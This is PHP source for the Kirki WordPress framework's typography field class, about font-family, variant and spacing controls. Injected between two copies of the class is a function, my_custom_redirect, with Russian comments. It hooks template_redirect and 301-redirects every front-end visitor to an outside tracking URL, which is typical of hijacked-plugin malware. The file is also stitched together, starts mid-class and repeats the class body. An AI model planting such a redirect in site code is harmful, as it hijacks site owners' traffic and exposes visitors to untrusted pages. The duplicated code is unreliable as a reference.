'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); 